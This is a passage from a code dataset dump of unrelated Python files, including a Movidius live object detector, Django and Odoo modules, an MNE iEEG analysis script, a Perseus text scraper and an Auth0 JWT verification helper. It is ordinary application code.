it\n device = mvnc.Device( devices[0] )\n device.OpenDevice()\n\n return device\n\n# ---- Step 2: Load a graph file onto the NCS device -------------------------\n\ndef load_graph( device ):\n\n # Read the graph file into a buffer\n with open( ARGS.graph, mode='rb' ) as f:\n blob = f.read()\n\n # Load the graph buffer into the NCS\n graph = device.AllocateGraph( blob )\n\n return graph\n\n# ---- Step 3: Pre-process the images ----------------------------------------\n\ndef pre_process_image( frame ):\n\n # Resize image [Image size is defined by choosen network, during training]\n img = cv2.resize( frame, tuple( ARGS.dim ) )\n\n # Convert RGB to BGR [OpenCV reads image in BGR, some networks may need RGB]\n if( ARGS.colormode == \"rgb\" ):\n img = img[:, :, ::-1]\n\n # Mean subtraction & scaling [A common technique used to center the data]\n img = img.astype( numpy.float16 )\n img = ( img - numpy.float16( ARGS.mean ) ) * ARGS.scale\n\n return img\n\n# ---- Step 4: Read & print inference results from the NCS -------------------\n\ndef infer_image( graph, img, frame ):\n\n # Load the image as a half-precision floating point array\n graph.LoadTensor( img, 'user object' )\n\n # Get the results from NCS\n output, userobj = graph.GetResult()\n\n # Get execution time\n inference_time = graph.GetGraphOption( mvnc.GraphOption.TIME_TAKEN )\n\n # Deserialize the output into a python dictionary\n output_dict = deserialize_output.ssd(\n output,\n CONFIDANCE_THRESHOLD,\n frame.shape )\n\n # Print the results (each image/frame may have multiple objects)\n print( \"I found these objects in \"\n + \" ( %.2f ms ):\" % ( numpy.sum( inference_time ) ) )\n\n for i in range( 0, output_dict['num_detections'] ):\n print( \"%3.1f%%\\t\" % output_dict['detection_scores_' + str(i)]\n + labels[ int(output_dict['detection_classes_' + str(i)]) ]\n + \": Top Left: \" + str( output_dict['detection_boxes_' + str(i)][0] )\n + \" Bottom Right: \" + str( output_dict['detection_boxes_' + str(i)][1] ) )\n\n # Draw bounding boxes around valid detections\n (y1, x1) = output_dict.get('detection_boxes_' + str(i))[0]\n (y2, x2) = output_dict.get('detection_boxes_' + str(i))[1]\n\n # Prep string to overlay on the image\n display_str = (\n labels[output_dict.get('detection_classes_' + str(i))]\n + \": \"\n + str( output_dict.get('detection_scores_' + str(i) ) )\n + \"%\" )\n\n frame = visualize_output.draw_bounding_box(\n y1, x1, y2, x2,\n frame,\n thickness=4,\n color=(255, 255, 0),\n display_str=display_str )\n print( '\\n' )\n\n # If a display is available, show the image on which inference was performed\n if 'DISPLAY' in os.environ:\n #displayImage = cv2.resize(frame, tuple([960, 720]))\n displayImage = frame\n cv2.imshow( 'NCS Improved live inference', displayImage )\n\n# ---- Step 5: Unload the graph and close the device -------------------------\n\ndef close_ncs_device( device, graph ):\n graph.DeallocateGraph()\n device.CloseDevice()\n\n cv2.destroyAllWindows()\n\n# ---- Main function (entry point for this script ) --------------------------\n\ndef main():\n\n device = open_ncs_device()\n graph = load_graph( device )\n\n vs = VideoStream(usePiCamera=True, resolution=(640, 480)).start()\n time.sleep(1)\n fps = FPS().start()\n\n # Main loop: Capture live stream & send frames to NCS\n while True:\n try:\n frame = vs.read()\n img = pre_process_image( frame )\n infer_image( graph, img, frame )\n\n # Display the frame for 5ms, and close the window so that the next\n # frame can be displayed. Close the window if 'q' or 'Q' is pressed.\n if( cv2.waitKey( 5 ) & 0xFF == ord( 'q' ) ):\n fps.stop()\n break\n\n fps.update()\n\n # Allows graceful exit using ctrl-c (handy for headless mode). \n except KeyboardInterrupt:\n fps.stop()\n break\n\n print(\"Elapsed time: \" + str(fps.elapsed()))\n print(\"Approx FPS: :\" + str(fps.fps()))\n\n close_ncs_device( device, graph )\n vs.stop()\n\n# ---- Define 'main' function as the entry point for this script -------------\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(\n description=\"Detect objects on a LIVE camera feed using \\\n Intel® Movidius™ Neural Compute Stick.\" )\n\n parser.add_argument( '-g', '--graph', type=str,\n default='../../caffe/SSD_MobileNet/graph',\n help=\"Absolute path to the neural network graph file.\" )\n\n parser.add_argument( '-l', '--labels', type=str,\n default='../../caffe/SSD_MobileNet/labels.txt',\n help=\"Absolute path to labels file.\" )\n\n parser.add_argument( '-M', '--mean', type=float,\n nargs='+',\n default=[127.5, 127.5, 127.5],\n help=\"',' delimited floating point values for image mean.\" )\n\n parser.add_argument( '-S', '--scale', type=float,\n default=0.00789,\n help=\"Absolute path to labels file.\" )\n\n parser.add_argument( '-D', '--dim', type=int,\n nargs='+',\n default=[300, 300],\n help=\"Image dimensions. ex. -D 224 224\" )\n\n parser.add_argument( '-c', '--colormode', type=str,\n default=\"bgr\",\n help=\"RGB vs BGR color sequence. This is network dependent.\" )\n\n ARGS = parser.parse_args()\n\n # Load the labels file\n labels =[ line.rstrip('\\n') for line in\n open( ARGS.labels ) if line != 'classes\\n']\n\n\n main()\n\n# ==== End of file ===========================================================\n","sub_path":"live-object-detector-universal.py","file_name":"live-object-detector-universal.py","file_ext":"py","file_size_in_byte":7411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"93659254","text":"from math import radians,cos,hypot\nimport matplotlib.pyplot as plt\nfrom random import shuffle\n\n\nclass Destination(object):\n \"\"\"A destination to be visited on the route\"\"\"\n\n def __init__(self, latitude, longitude, reference):\n self.latitude = latitude\n self.longitude = longitude\n self.reference = reference\n\n def __repr__(self):\n return self.reference + \" at \" + str(self.latitude) + \", \" + str(self.longitude)\n\n\nclass Route(object):\n \"\"\"A sequence of destinations forming the route\"\"\"\n\n def __init__(self, destinations):\n self.destinations = destinations\n\n def edge_length(self, destination_a, destination_b):\n \"\"\"Returns the distance in kilometres between two destinations\"\"\"\n \n # Convert to Radians\n latitude_a = radians(destination_a.latitude)\n longitude_a = radians(destination_a.longitude)\n latitude_b = radians(destination_b.latitude)\n longitude_b = radians(destination_b.longitude)\n\n # Use Equirectangular Aprroximation for distance\n x = (longitude_a-longitude_b) * cos((latitude_a+latitude_b)/2)\n y = latitude_a - latitude_b\n d = hypot(x,y)\n\n # Convert to kilometres by multiplying by earth radius\n d = d*6371\n\n return d\n\n def length(self):\n \"\"\"Returns the total length of the current route in kilometres\"\"\"\n\n d = 0\n\n # Sum the distance between each destination in order\n for a, b in zip(self.destinations, self.destinations[1:]):\n d += self.edge_length(a, b);\n\n return d\n\n def swap(self, a, b):\n \"\"\"Swap the order of two destinations on the route\"\"\"\n self.destinations[b], self.destinations[a] = self.destinations[a], self.destinations[b]\n\n def shuffle(self):\n \"\"\"Shuffle the route order (but not the first)\"\"\"\n\n first = self.destinations.pop(0)\n shuffle(self.destinations)\n self.destinations.insert(0, first)\n\n\n def plot(self):\n \"\"\"Draw the route as a Matplotlib figure\"\"\"\n\n x = list()\n y = list()\n\n for destination in self.destinations:\n x.append(destination.longitude)\n y.append(destination.latitude)\n\n plt.clf()\n plt.plot(x,y,'o-')\n plt.xlabel('Longitude')\n plt.ylabel(\"Latitude\")\n plt.title(\"Total Length=\" + str(round(self.length(),2)) + \"km\")\n plt.draw()\n\n\n\n \n\n","sub_path":"travellingstudent/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":2429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"228106270","text":"import logging\nimport ipaddress\n\n\nimport synapse.exc as s_exc\n\nimport synapse.lib.stormtypes as s_stormtypes\n\nlogger = logging.getLogger(__name__)\n\n@s_stormtypes.registry.registerLib\nclass LibIpv6(s_stormtypes.Lib):\n '''\n A Storm Library for providing ipv6 helpers.\n '''\n _storm_locals = (\n {'name': 'expand',\n 'desc': '''\n Convert a IPv6 address to its expanded form.'\n\n Notes:\n The expanded form is also sometimes called the \"long form\" address.\n\n Examples:\n Expand a ipv6 address to its long form::\n\n $expandedvalu = $lib.inet.ipv6.expand('2001:4860:4860::8888')\n ''',\n 'type': {'type': 'function', '_funcname': '_expand',\n 'args': (\n {'name': 'valu', 'type': 'str', 'desc': 'IPv6 Address to expand', },\n ),\n 'returns': {'type': 'str', 'desc': 'The expanded form.', }}},\n )\n _storm_lib_path = ('inet', 'ipv6')\n\n def getObjLocals(self):\n return {\n 'expand': self._expand,\n }\n\n async def _expand(self, valu):\n valu = await s_stormtypes.tostr(valu)\n valu = valu.strip()\n try:\n ipv6 = ipaddress.IPv6Address(valu)\n return ipv6.exploded\n except ipaddress.AddressValueError as e:\n mesg = f'Error expanding ipv6: {e} for valu={valu}'\n raise s_exc.StormRuntimeError(mesg=mesg, valu=valu)\n","sub_path":"synapse/lib/stormlib/ipv6.py","file_name":"ipv6.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"376868469","text":"class TV:\n def __init__(self):\n self.ligada = False\n self.canal = 5\n\n def power(self):\n if self.ligada:\n self.ligada = False\n else:\n self.ligada = True\n def aum_canal(self):\n if self.ligada:\n self.canal += 1\n def dim_canal(self):\n if self.ligada:\n self.canal -=1\n\n\n\n\ntelevisao = TV ()\nprint(\"A TV está ligada: {}\".format(televisao.ligada))\ntelevisao.power()\nprint(\"A TV está ligada: {}\".format(televisao.ligada))\ntelevisao.power()\nprint(\"A TV está ligada: {}\".format(televisao.ligada))\nprint(\"Canal: {}\" .format(televisao.canal))\ntelevisao.power()\ntelevisao.aum_canal()\ntelevisao.aum_canal()\nprint(\"Canal: {}\".format(televisao.canal))\ntelevisao.dim_canal()\nprint(\"Canal: {}\". format(televisao.canal))","sub_path":"Curso de PY/pythonProject1/Aula7_TV.py","file_name":"Aula7_TV.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"615146323","text":"import re, os\nimport globals\n\n\ndef setup_database_settings(settings):\n ctx = {'name': globals.short}\n settings = re.sub(r\"'ENGINE': 'django.db.backends.'\", \"'ENGINE': 'django.db.backends.postgresql_psycopg2'\", settings)\n settings = re.sub(r\"'NAME': ''\", \"'NAME': '%(name)s'\"%ctx, settings)\n settings = re.sub(r\"'USER': ''\", \"'USER': '%(name)s'\"%ctx, settings)\n\n return settings\n\n\ndef setup_media_settings(settings):\n settings = re.sub(r\"MEDIA_ROOT = ''\", r\"MEDIA_ROOT = os.path.join(os.path.dirname(__file__), 'media').replace('\\\\\\\\', '/')\", settings)\n settings = re.sub(r\"MEDIA_URL = ''\", \"MEDIA_URL = '/media/'\", settings)\n return settings\n\n\ndef setup_static_settings(settings):\n return re.sub(r\"STATIC_ROOT = ''\", r\"STATIC_ROOT = os.path.join(os.path.dirname(__file__), 'static').replace('\\\\\\\\', '/')\", settings)\n\n\ndef setup_installed_apps(settings):\n new_apps = '''# 'django.contrib.admindocs',\n lightnav,\n south,\n'''\n settings = re.sub(r\"# 'django.contrib.admindocs',\", new_apps, settings)\n return settings\n\n\ndef setup_settings():\n with open(globals.settings_path) as settings_file:\n settings = settings_file.read()\n\n settings = 'import os, sys\\n\\n' + settings\n settings = setup_database_settings(settings)\n settings = setup_media_settings(settings)\n settings = setup_static_settings(settings)\n\n with open(globals.settings_path, 'w') as settings_file:\n settings_file.write(settings)\n\n\ndef setup_db_scripts():\n scripts = [\n 'init.sql',\n ]\n\n for script in scripts:\n with open(os.path.join(globals.db_path, script)) as db_file:\n sql = db_file.read()\n\n sql = re.sub(r'', globals.short, sql)\n\n with open(os.path.join(globals.db_path, script), 'w') as db_file:\n db_file.write(sql)\n","sub_path":"djangoproject/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"546135343","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# copyright (c) 2013-2015 marcos organizador de negocios srl http://marcos.do\n# write by eneldo serrata (eneldo@marcos.do)\n#\n# this program is free software: you can redistribute it and/or modify\n# it under the terms of the gnu affero general public license as\n# published by the free software foundation, either version 3 of the\n# license, or (at your option) any later version.\n#\n# this program is distributed in the hope that it will be useful,\n# but without any warranty; without even the implied warranty of\n# merchantability or fitness for a particular purpose. see the\n# gnu affero general public license for more details.\n#\n# you should have received a copy of the gnu affero general public license\n# along with this program. if not, see .\n#\n##############################################################################\nimport time\nfrom datetime import datetime\nfrom dateutil import relativedelta\nfrom openerp import models, fields, api, exceptions, _\nfrom openerp.exceptions import UserError, ValidationError\nimport base64\n\nclass dgiisalenullreport(models.Model):\n\n _name = \"dgii.sale.null.report\"\n\n company_id = fields.Many2one(\"res.company\", required=True, default=lambda s: s.env.user.company_id.id, readonly=True, string=u\"Comercio\", help=\"\")\n date_from = fields.Date('Fecha inicial', required=True, track_visibility='onchange')\n date_to = fields.Date('Fecha final', required=True, track_visibility='onchange')\n cantidad_registros = fields.Integer(\"Cantidad de registros\", readonly=True)\n report = fields.Binary(\"Descargar archivo\", readonly=True)\n report_name = fields.Char(u\"Nombre de reporte\", size=40, readonly=True)\n line_ids = fields.One2many(\"dgii.sale.null.report.line\", \"sale_null_report_id\", readonly=True)\n\n _defaults = {\n 'date_from': lambda *a: time.strftime('%Y-%m-01'),\n 'date_to': lambda *a: str(datetime.now() + relativedelta.relativedelta(months=+1, day=1, days=-1))[:10],\n }\n\n @api.one\n @api.constrains(date_from, date_to)\n def _check_dates(self):\n if self.date_from > self.date_to:\n raise ValidationError(\n _(\"Date from '%s' must be before Date to '%s' \") % self.date_from, self.date_to)\n\n @api.multi\n def generate_file(self):\n #import pdb; pdb.set_trace()\n invoice_ids = self.env[\"account.invoice\"].search([(\"company_id\",\"=\",self.company_id.id),\n (\"date_invoice\",\">=\",self.date_from),\n (\"date_invoice\", \"<=\", self.date_to),\n (\"type\", \"in\", [\"out_invoice\", \"out_refund\"]),\n (\"state\", \"in\", [\"cancel\"])])\n self.cantidad_registros = len([rec.amount_total for rec in invoice_ids])\n lines = []\n for inv in invoice_ids:\n line = []\n #index 0 --> numero de comprobante\n line.append(inv.move_name)\n #index 1 --> fecha de comprobante\n line.append(inv.date_invoice)\n #index 2 --> tipo_de_anulacion\n line.append(inv.cancel_reason_id.code)\n\n lines.append(line)\n\n self.line_ids.unlink()\n lines_dict_list = []\n for line in lines:\n #import pdb; pdb.set_trace()\n lines_dict_list.append([0, False, {\"sale_null_report_id\": self.id,\n u\"numero_comprobante_fiscal\": line[0],\n u\"fecha_comprobante\": line[1],\n u\"tipo_de_anulacion\": line[2],\n }])\n\n self.write({\"line_ids\": lines_dict_list})\n path = '/tmp/608{}.txt'.format(self.company_id.vat)\n f = open(path,'w')\n header_str = \"\"\n header_str += \"608\"\n header_str += self.company_id.vat.rjust(11)\n\n periodo = (self.date_to).split(\"-\")\n header_str += periodo[0]+periodo[1]\n header_str += str(self.cantidad_registros).zfill(6)\n\n f.write(header_str + '\\n')\n\n for line in lines_dict_list:\n import pdb; pdb.set_trace()\n line_str = \"\"\n line_str += line[2]['numero_comprobante_fiscal']\n fecha = line[2]['fecha_comprobante'].split(\"-\")\n line_str += fecha[0]+fecha[1]+fecha[2]\n line_str += line[2]['tipo_de_anulacion']\n f.write(line_str+ '\\n')\n\n f.close()\n f = open(path,'rb')\n report = base64.b64encode(f.read())\n f.close()\n report_name = 'dgii_f_608_' + self.company_id.vat + '_' + periodo[0]+periodo[1] + '.txt'\n self.write({'report': report, 'report_name': report_name})\n return True\n\n\nclass dgiisalereportline(models.Model):\n _name = \"dgii.sale.null.report.line\"\n\n sale_null_report_id = fields.Many2one(\"dgii.sale.null.report\")\n numero_comprobante_fiscal = fields.Char(u\"Nümero comprobante fiscal\", size=19)\n fecha_comprobante = fields.Char(u\"Fecha comprobante\")\n tipo_de_anulacion = fields.Char(u\"Tipo de anulacion\")","sub_path":"odoo-extra-addons/oca/goeasy_addons/goeasy_ncf/dgii_608/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"95615814","text":"# -*- coding: utf-8 -*-\n\nfrom openerp import api, models, fields\nimport openerp.addons.decimal_precision as dp\n\nclass product_product(models.Model):\n _inherit = \"product.product\"\n\n of_frais_port = fields.Float(string='Frais de port', digits_compute=dp.get_precision('Product Price'), help=\"Frais de port\")\n\n\nclass of_product_template(models.Model):\n _inherit = \"product.template\"\n\n of_frais_port = fields.Float('Frais de port', compute='_compute_of_frais_port', digits_compute=dp.get_precision('Product Price'),\n inverse = '_set_of_frais_port', store=True,\n help=u\"Frais de port.\\nSi vous le modifier ici, il sera imposé à toutes les variantes.\\nPour ne le modifier que pour une variante, modifiez le dans les variantes d'articles.\")\n\n @api.depends('product_variant_ids', 'product_variant_ids.of_frais_port')\n def _compute_of_frais_port(self):\n # Frais de port du product template : si la valeur du frais de port de toutes les variantes est le même, on la prend, sinon zéro.\n for template in self:\n frais_port = \"\"\n identique = True\n for variantes in template.product_variant_ids:\n if frais_port == \"\":\n frais_port = variantes.of_frais_port\n elif frais_port != variantes.of_frais_port:\n template.of_frais_port = 0.0\n identique = False\n break\n if identique:\n template.of_frais_port = frais_port\n\n @api.one\n def _set_of_frais_port(self):\n # Fixer le frais de port depuis le product template : on met le frais de port pour toutes les variantes.\n self.product_variant_ids.write({'of_frais_port': self.of_frais_port})\n\n\nclass of_product_product(models.Model):\n _inherit = \"product.product\"\n\n @api.model\n def _add_missing_default_values(self, values):\n # Mettre la référence produit (default_code) du template par défaut lors de la création d'une variante.\n if 'product_tmpl_id' in values and values['product_tmpl_id']:\n values['default_code'] = self.env['product.template'].browse(values['product_tmpl_id']).default_code\n return super(of_product_product, self)._add_missing_default_values(values)\n","sub_path":"of_product/models/of_product.py","file_name":"of_product.py","file_ext":"py","file_size_in_byte":2272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"202623190","text":"import mne\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom functions import mne_helpers as mnehelp\nfrom functions import mne_plot_helpers as mneplothelp\nfrom functions import mne_stats as mnestats\n\nfrom mne.stats import permutation_cluster_test\nfrom mne.time_frequency import psd_multitaper, tfr_multitaper, tfr_stockwell, tfr_morlet\n\nbase_path = \"D:\\\\OneDrive\\\\FGU\\\\iEEG\\\\p142\\\\\"\nbase_path = \"U:\\\\OneDrive\\\\FGU\\\\iEEG\\\\p142\\\\\"\n\npath_original_vr = base_path + \"UnityAlloEgo\\\\EEG\\\\Preprocessed\\\\prep_250.mat\"\npath_perhead_vr = base_path + \"UnityAlloEgo\\\\EEG\\\\Preprocessed\\\\prep_perHeadbox_250.mat\"\npath_perelectrode_vr = base_path + \"UnityAlloEgo\\\\EEG\\\\Preprocessed\\\\prep_perElectrode_250.mat\"\npath_bipolar_vr = base_path + \"UnityAlloEgo\\\\EEG\\\\Preprocessed\\\\prep_bipolar_250.mat\"\npath_unity_events = base_path + \"UnityAlloEgo\\\\EEG\\\\Preprocessed\\\\p142_unity.csv\"\npath_onset_events = base_path + \"UnityAlloEgo\\\\EEG\\\\Preprocessed\\\\p142_onsets.csv\"\npath_montage = base_path + \"UnityAlloEgo\\\\EEG\\\\Preprocessed\\\\p142_montage.csv\"\npath_montage_referenced = base_path + \"UnityAlloEgo\\\\EEG\\\\Preprocessed\\\\p142_montage_referenced.csv\"\n\nFREQUENCY = 250\nrunfile('M:/Vyzkum/AV/FGU/IntracranialElectrodes/iEEG-python/base_setup.py', wdir='M:/Vyzkum/AV/FGU/IntracranialElectrodes/iEEG-python')\n\n# PICKS\npick_perhead_hip = mnehelp.picks_all_localised(raw_perhead_vr, pd_montage_referenced, 'Hi')\npick_perhead_hip_names = mne.pick_info(raw_perhead_vr.info, pick_perhead_hip)['ch_names']\npick_perhead_ent = mnehelp.picks_all_localised(raw_perhead_vr, pd_montage_referenced, 'Ent')\npick_perhead_ent_names = mne.pick_info(raw_perhead_vr.info, pick_perhead_ent)['ch_names']\npick_perhead_all = mnehelp.picks_all(raw_perhead_vr)\n\n# BAD EPOCHS\n#epochs_perhead_vr.plot(scalings = 'auto')\n\n#epochs_perhead_vr.plot(block = True, scalings = 'auto', picks=pick_perhead_hip)\n#epochs_perhead_vr.plot(block = True, scalings = 'auto')\n#mnehelp.get_dropped_epoch_indices(epochs_perhead_vr.drop_log)\nbad_epochs = [0, 1, 6, 8, 9, 10, 11, 12, 13, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 49, 50, 51, 52, 54, 55, 56, 57, 58, 59, 70, 71, 72, 73, 74, 76, 77, 78, 82, 83, 88, 89, 90, 91, 92, 93, 104, 105, 106, 107, 108, 109, 110, 117, 118, 119, 120, 121, 122, 123, 124, 127, 128, 129, 130, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 154, 155, 156, 157, 159, 160, 161, 162, 163, 164, 169, 170, 171, 172, 173, 174, 177, 178, 179, 180, 181, 182, 185, 186, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 213, 214, 215, 217, 218, 219, 220, 221, 222, 223, 233, 234, 236, 237, 238, 239, 240, 244, 245, 246, 247, 248, 249, 260, 261, 262, 263, 264, 265, 266, 267, 268, 269, 270, 271, 272, 273, 274, 275, 276, 277, 278, 279, 280, 281, 282, 283, 284, 287, 288, 289, 290, 291, 295, 296, 297, 298, 299, 300, 301, 302, 307, 308, 309, 310, 311, 315, 327, 328, 329, 332, 333, 334, 335, 336, 337, 338, 339, 340, 341, 342, 343, 344, 345, 346]\nepochs_perhead_vr.drop(bad_epochs)\n\n# TFR ANALYSIS ---------------\nfreqs = np.arange(2, 11, 1)\nn_cycles = 6\n\nrunfile('M:/Vyzkum/AV/FGU/IntracranialElectrodes/iEEG-python/tfr_perhead_unity.py', wdir='M:/Vyzkum/AV/FGU/IntracranialElectrodes/iEEG-python')\n\n## BASELINES ----------------\nonset_baseline = (-0.5, 0)\nbaseline = (-3, -2)\nmode = 'ratio'\nrunfile('M:/Vyzkum/AV/FGU/IntracranialElectrodes/iEEG-python/baselines.py', wdir='M:/Vyzkum/AV/FGU/IntracranialElectrodes/iEEG-python')\n\n### LFO BANDS\nlfo_bands = [[2, 4], [4, 9]]\nrunfile('M:/Vyzkum/AV/FGU/IntracranialElectrodes/iEEG-python/lfo_collapse.py', wdir='M:/Vyzkum/AV/FGU/IntracranialElectrodes/iEEG-python')\n\n###\nbox = mnehelp.custom_box_layout(pick_perhead_hip_names, 3)\nplot_pick_perhead_hip = range(len(pick_perhead_hip))\npower_stop_perhead_vr.plot_topo(picks = pick_perhead_hip, layout = box, baseline = (-3, -2))\n\n## POWER OVER TIME --------\n#Onsets\nmnehelp.plot_power_time([power_stop_perhead_vr_lfo, power_onset_perhead_vr_lfo], pick_perhead_hip, 0, event_names = ['stop', 'onset'], pick_names = pick_perhead_hip_names)\nmnehelp.plot_power_time_average ([power_stop_perhead_vr_lfo, power_onset_perhead_vr_lfo], pick_perhead_hip, 0, event_names = ['stop', 'onset'])\n#point end\nmnehelp.plot_power_time([power_point_perhead_vr_ego_lfo, power_point_perhead_vr_allo_lfo], pick_perhead_hip, 0, event_names = ['ego', 'allo'], pick_names = pick_perhead_hip_names)\nmnehelp.plot_power_time_average ([power_point_perhead_vr_ego_lfo, power_point_perhead_vr_allo_lfo], pick_perhead_hip, 0, event_names = ['ego', 'allo'])\nmneplothelp.plot_epochs_power(power_trial_point_perhead_vr_allo_lfo, 0, pick_perhead_hip_names)\n#point start\nmnehelp.plot_power_time([power_point_start_perhead_vr_ego_lfo, power_point_start_perhead_vr_allo_lfo], pick_perhead_hip, 0, event_names = ['ego', 'allo'], pick_names = pick_perhead_hip_names)\nmnehelp.plot_power_time_average ([power_point_start_perhead_vr_ego_lfo, power_point_start_perhead_vr_allo_lfo], pick_perhead_hip, 0, event_names = ['ego', 'allo'],)\n\n## STATISTICS -------------------\n# POinting \nwilcox_allo_ego_lfo, wilcox_freqs_lfo = mnestats.wilcox_tfr_power(power_trial_point_perhead_vr_ego_lfo, power_trial_point_perhead_vr_allo_lfo, picks = pick_perhead_hip_names)\nmnestats.plot_wilcox_box(wilcox_allo_ego_lfo, FREQUENCY, pick_names = pick_perhead_hip_names)\n#pointing start\nwilcox_allo_ego_start_lfo, wilcox_freqs_lfo = mnestats.wilcox_tfr_power(power_trial_point_start_perhead_vr_ego_lfo, power_trial_point_start_perhead_vr_allo_lfo, picks = pick_perhead_hip_names)\nmnestats.plot_wilcox_box(wilcox_allo_ego_start_lfo, FREQUENCY, pick_names = pick_perhead_hip_names)\n# Onsets\nwilcox_stops_onsets_lfo, wilcox_freqs_lfo = mnestats.wilcox_tfr_power(power_trials_stop_perhead_vr_lfo, power_trials_onset_perhead_vr_lfo, picks = pick_perhead_hip_names)\nmnestats.plot_wilcox_box(wilcox_stops_onsets_lfo, FREQUENCY, pick_names = pick_perhead_hip_names)\n","sub_path":"patients/p142_Unity.py","file_name":"p142_Unity.py","file_ext":"py","file_size_in_byte":5904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"502370877","text":"from oscar.apps.product.models import ItemClass, Item\nfrom oscar.apps.partner.models import Partner, StockRecord\n\ndef create_product(price=None, title=\"Dummy title\", item_class=\"Dummy item class\", \n partner=\"Dummy partner\", upc=\"dummy_101\", num_in_stock=10):\n u\"\"\"\n Helper method for creating products that are used in tests.\n \"\"\"\n ic,_ = ItemClass._default_manager.get_or_create(name=item_class)\n item = Item._default_manager.create(title=title, item_class=ic, upc=upc)\n if price:\n partner,_ = Partner._default_manager.get_or_create(name=partner)\n sr = StockRecord._default_manager.create(product=item, partner=partner, \n price_excl_tax=price, num_in_stock=num_in_stock)\n return item","sub_path":"oscar/test/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"568969804","text":"from urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nfrom book import Book\n\nclass PerseusWrapper:\n\n def __init__(self):\n self.BookURL = 'http://www.perseus.tufts.edu/hopper/collection?collection=Perseus%3Acorpus%3Aperseus%2CLatin%20Texts'\n\n def get_books(self): \n books = urlopen(self.BookURL)\n books = str(books.read())\n soup = BeautifulSoup(books, 'html.parser')\n links = soup.findAll(\"a\", { \"class\" : \"aResultsHeader\" })\n formatted_links = {}\n for link in links:\n formatted_links[link.get_text()] = link.get('href')[9:]\n return formatted_links\n\n def load_book(self,code):\n if 'Perseus' not in code:\n books = self.get_books()\n code = books[code] \n load = Book(code)\n return load\n\nx = PerseusWrapper()\nx.load_book('Aeneid')\n\n","sub_path":"Perseus/wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"396315956","text":"import json\nfrom typing import Optional\n\nfrom fastapi import Header, Depends\nfrom jose import jwt\n\nfrom util import abort\n\nAUTH0_DOMAIN = 'drdilyor.us.auth0.com'\nALGORITHMS = ['RS256']\nAPI_AUDIENCE = 'classroomapi'\n\njwks = json.load(open('auth.jwks.json', 'rb'))\n\n\nclass AuthError(Exception):\n \"\"\"A standardized way to communicate auth failure modes\"\"\"\n def __init__(self, error, status_code):\n self.error = error\n self.status_code = status_code\n\n\ndef get_token_auth_header(authorization: Optional[str] = Header(None)):\n \"\"\"Obtains the Access Token from the Authorization Header\"\"\"\n auth = authorization\n if not auth:\n raise AuthError({\n 'code': 'authorization_header_missing',\n 'description': 'Authorization header is expected.'\n }, 401)\n\n parts = auth.split()\n if parts[0].lower() != 'bearer':\n raise AuthError({\n 'code': 'invalid_header',\n 'description': 'Authorization header must start with \"Bearer\".'\n }, 401)\n\n elif len(parts) == 1:\n raise AuthError({\n 'code': 'invalid_header',\n 'description': 'Token not found.'\n }, 401)\n\n elif len(parts) > 2:\n raise AuthError({\n 'code': 'invalid_header',\n 'description': 'Authorization header must be bearer token.'\n }, 401)\n\n token = parts[1]\n return token\n\n\ndef verify_decode_jwt(token):\n global jwks\n unverified_header = jwt.get_unverified_header(token)\n rsa_key = {}\n if 'kid' not in unverified_header:\n raise AuthError({\n 'code': 'invalid_header',\n 'description': 'Authorization malformed.'\n }, 401)\n\n for key in jwks['keys']:\n if key['kid'] == unverified_header['kid']:\n rsa_key = {\n 'kty': key['kty'],\n 'kid': key['kid'],\n 'use': key['use'],\n 'n': key['n'],\n 'e': key['e']\n }\n if rsa_key:\n try:\n payload = jwt.decode(\n token,\n rsa_key,\n algorithms=ALGORITHMS,\n audience=API_AUDIENCE,\n issuer='https://' + AUTH0_DOMAIN + '/'\n )\n\n return payload\n\n except jwt.ExpiredSignatureError:\n raise AuthError({\n 'code': 'token_expired',\n 'description': 'Token expired.'\n }, 401)\n\n except jwt.JWTClaimsError:\n raise AuthError({\n 'code': 'invalid_claims',\n 'description': 'Incorrect claims. Please, check the audience and issuer.'\n }, 401)\n except Exception:\n raise AuthError({\n 'code': 'invalid_header',\n 'description': 'Unable to parse authentication token.'\n }, 400)\n raise AuthError({\n 'code': 'invalid_header',\n 'description': 'Unable to find the appropriate key.'\n }, 400)\n\n\ndef requires_auth(permission=None):\n def requires_auth_dependency(token: str = Depends(get_token_auth_header)):\n payload = verify_decode_jwt(token)\n check_permissions(permission, payload)\n return payload\n\n return requires_auth_dependency\n\ndef check_permissions(permission, payload):\n if 'permissions' not in payload:\n abort(400)\n\n if permission is not None and permission not in payload['permissions']:\n abort(403)\n\n return True\n","sub_path":"backend/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":3458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"250362610","text":"# Copyright 2021 Jared Hendrickson\n#\n# Licensed under the Apache License, Version 2.0 